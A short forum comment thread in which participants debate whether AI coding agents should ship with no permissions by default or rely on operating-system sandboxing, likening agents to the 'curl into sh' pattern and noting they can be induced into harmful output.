Determinism is one thing, but the more pressing thing is permission boundaries. All these AI agent tools need to come with no permissions at all out of the box, and everything should be granularly granted. But that would break all the cool demos and marketing pitches.

Allowing agent to run wild with any arbitrary shell commands is just plain stupid. This should never happen to begin with.

▲

zzzeek a day ago | parent | next [-]

> All these AI agent tools need to come with no permissions at all out of the box, and everything should be granularly granted.

That's what the tools already do. if you were watching some cool demo that didnt have all the prompts they may have been running the tools in "yolo mode" which is not usually a normal thing.

▲

TZubiri a day ago | parent | prev [-]

That's what they are actually doing.

I think quite opposite, agents need to come with all permissions possible, highlighting that it's actually the OS responsibility to constrain it.

It's kind of dumb to except a process to constrain itself.

▲

VTimofeenko a day ago | parent [-]

A non-deterministic process at that. Coding agents are basically "curl into sh" pattern on steroids

	▲	Terr_ a day ago \| parent [-]
		Even worse, the sh portion is recursive. So the attacker doesn't need to send an evil-bit over the network, if they can trigger the system into dreaming up the evil-bit indirectly as its own output at some point.